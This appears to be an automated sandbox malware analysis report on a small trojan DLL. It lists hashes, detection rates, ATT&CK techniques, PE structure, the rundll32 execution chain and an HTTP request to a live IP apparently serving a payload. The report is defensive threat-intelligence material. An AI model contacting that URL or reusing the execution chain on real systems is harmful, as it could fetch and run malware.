Analysis Report sample3.bin

Overview

General Information

Sample Name: sample3.bin (renamed file extension from bin to dll)
Analysis ID: 339445
MD5: b4164149ffc43c2bf55cb66922e738b0
SHA1: 78c01aa4f88d35acfbc3d7142232cd1aa7682a6e
SHA256: 800e1192e5ec3d2d9b17a3e2d8996cadbdd96ac6d8c59dfcf989264a956eb8d4

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Creates a DirectInput object (often for capturing keystrokes)
Internet Provider seen in connection with other malware
Program does not show much activity (idle)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 3564 cmdline: loaddll32.exe 'C:\Users\user\Desktop\sample3.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • rundll32.exe (PID: 2148 cmdline: rundll32.exe C:\Users\user\Desktop\sample3.dll,D MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: sample3.dll | Virustotal: Detection: 56%
Source: sample3.dll | ReversingLabs: Detection: 68%
Source: sample3.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: sample3.dll | Static PE information: NO_SEH, DYNAMIC_BASE, NX_COMPAT
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: global traffic | HTTP traffic detected: GET /campo/z/z HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 207.154.235.218 Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 207.154.235.218
Source: sample3.dll | String found in binary or memory: http://207.154.235.218/campo/z/z
Source: sample3.dll | String found in binary or memory: http://207.154.235.218/campo/z/zC:
Source: loaddll32.exe, 00000001.00000002.210657283.000000000105B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: classification engine | Classification label: mal56.evad.winDLL@4/0@0/1
Source: sample3.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\sample3.dll,D
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\sample3.dll'
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\sample3.dll,D
Source: sample3.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00F2EB77 push eax; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00F2EE61 push eax; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00F2EA91 push eax; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00F2CE94 pushad ; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 207.154.235.218 80

Mitre Att&ck Matrix

Techniques per tactic (bracketed numbers are the matrix's hit counters for matched techniques):

  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts
  • Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux)
  • Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
  • Privilege Escalation: Process Injection [1][1]; Boot or Logon Initialization Scripts; Logon Script (Windows)
  • Defense Evasion: Rundll32 [1]; Process Injection [1][1]; Obfuscated Files or Information [1]
  • Credential Access: Input Capture [1]; LSASS Memory; Security Account Manager
  • Discovery: System Information Discovery [1]; Application Window Discovery; Query Registry
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
  • Collection: Input Capture [1]; Data from Removable Media; Data from Network Shared Drive
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
  • Command and Control: Non-Application Layer Protocol [1]; Application Layer Protocol [1][1]; Ingress Tool Transfer [1]
  • Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location
  • Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
  • Impact: Modify System Partition; Device Lockout; Delete Device Data

Behavior Graph

[Behavior graph image; legend entries: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
sample3.dll | 57% | Virustotal |
sample3.dll | 3% | Metadefender |
sample3.dll | 69% | ReversingLabs | Win32.Trojan.Tiny

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://207.154.235.218/campo/z/z | 4% | Virustotal |
http://207.154.235.218/campo/z/z | 0% | Avira URL Cloud | safe
http://207.154.235.218/campo/z/zC: | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://207.154.235.218/campo/z/z | true | 4% (Virustotal); Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://207.154.235.218/campo/z/zC: | sample3.dll | false | Avira URL Cloud: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
207.154.235.218 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 339445
Start date: 14.01.2021
Start time: 03:57:54
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 2m 7s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: sample3.bin (renamed file extension from bin to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal56.evad.winDLL@4/0@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Stop behavior analysis, all processes terminated
Warnings:
  • Exclude process from analysis (whitelisted): svchost.exe
  • Execution Graph export aborted for target rundll32.exe, PID 2148 because there are no executed functions
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
03:58:46 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
207.154.235.218 | SecuriteInfo.com.Exploit.Siggen2.65090.20789.xls | malicious | 207.154.235.218/campo/q/q
207.154.235.218 | SecuriteInfo.com.Exploit.Siggen2.65090.20789.xls | malicious | 207.154.235.218/campo/q/q

Domains

No context

ASN

Match: DIGITALOCEAN-ASNUS

Associated Sample Name / URL | Detection | Context
sample1.doc | malicious | 188.226.165.170
RRW9901200241.exe | malicious | 161.35.25.247
Byrnes Gould PLLC.odt | malicious | 178.128.131.91
pHUWiFd56t.exe | malicious | 107.170.138.56
Project review_Pdf.exe | malicious | 128.199.234.84
Consignment Details.exe | malicious | 161.35.147.117
btVnDhh5K7.exe | malicious | 167.71.226.205
0XrD9TsGUr.exe | malicious | 107.170.138.56
RFQ 41680.xlsx | malicious | 178.62.58.5
Doc.doc | malicious | 178.128.68.22
mobdro.apk | malicious | 142.93.74.196
mobdro.apk | malicious | 142.93.74.196
Test.HTM | malicious | 159.89.4.250
Doc.doc | malicious | 167.71.148.58
Electronic form.doc | malicious | 157.245.123.197
______.doc | malicious | 188.166.207.182
______.doc | malicious | 188.166.207.182
http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.com | malicious | 5.101.110.225
info.doc | malicious | 138.197.99.250
JI35907_2020.doc | malicious | 178.128.68.22

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 3.6753551074955317
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: sample3.dll
File size: 4096
MD5: b4164149ffc43c2bf55cb66922e738b0
SHA1: 78c01aa4f88d35acfbc3d7142232cd1aa7682a6e
SHA256: 800e1192e5ec3d2d9b17a3e2d8996cadbdd96ac6d8c59dfcf989264a956eb8d4
SHA512: 3971ffaed0a282602fdd0984093480638eab6415351c80e6e6a3921b4a312f2451d0f6964370a5f471ee52f3776c86dce757fd5d4ee1e0b150e92efda4054048
SSDEEP: 48:aOYItNcalsIk6B82DyWVyzKZ+uhFJheDrJsRuUTe:frlsIv+khQlrJMdT
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................b......................./......./......./......./.......Rich....................PE..L......^...........!.......

File Icon

Icon Hash: 74f0e4ecccdce0e4

Static PE Info

General

Entrypoint: 0x10000000
Entrypoint Section:
Digitally signed: false
Imagebase: 0x10000000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics: NO_SEH, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5EC4118E [Tue May 19 17:04:14 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 00efe7c5f7ae0f17696c089cc9514203

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2180 | 0x44 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x22b0 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0xf8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5000 | 0x58 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2140 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x20 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x288 | 0x400 | False | 0.4169921875 | data | 4.07030293356 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x380 | 0x400 | False | 0.556640625 | data | 4.45928642652 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3000 | 0x18 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0xf8 | 0x200 | False | 0.3359375 | data | 2.51196201565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x5000 | 0x58 | 0x200 | False | 0.19921875 | data | 1.32066429345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_MANIFEST | 0x4060 | 0x91 | XML 1.0 document text | English | United States

Imports

DLL | Import
KERNEL32.dll | GetProcAddress, LoadLibraryA, LocalAlloc, lstrlenA, CloseHandle
VCRUNTIME140.dll | memset

Exports

Name | Ordinal | Address
D | 1 | 0x10001110

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2021 03:58:43.856898069 CET | 49715 | 80 | 192.168.2.3 | 207.154.235.218
Jan 14, 2021 03:58:43.897797108 CET | 80 | 49715 | 207.154.235.218 | 192.168.2.3
Jan 14, 2021 03:58:43.898005009 CET | 49715 | 80 | 192.168.2.3 | 207.154.235.218
Jan 14, 2021 03:58:43.899333000 CET | 49715 | 80 | 192.168.2.3 | 207.154.235.218
Jan 14, 2021 03:58:43.939624071 CET | 80 | 49715 | 207.154.235.218 | 192.168.2.3
Jan 14, 2021 03:58:43.939666033 CET | 80 | 49715 | 207.154.235.218 | 192.168.2.3
Jan 14, 2021 03:58:43.939781904 CET | 49715 | 80 | 192.168.2.3 | 207.154.235.218
Jan 14, 2021 03:58:43.941756964 CET | 49715 | 80 | 192.168.2.3 | 207.154.235.218
Jan 14, 2021 03:58:43.981983900 CET | 80 | 49715 | 207.154.235.218 | 192.168.2.3

HTTP Request Dependency Graph

  • 207.154.235.218

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49715 | 207.154.235.218 | 80 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2021 03:58:43.899333000 CET | 605 | OUT | GET /campo/z/z HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 207.154.235.218
Connection: Keep-Alive


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 03:58:42
Start date: 14/01/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe 'C:\Users\user\Desktop\sample3.dll'
Imagebase: 0x230000
File size: 120832 bytes
MD5 hash: 2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 03:58:42
Start date: 14/01/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\sample3.dll,D
Imagebase: 0x11a0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis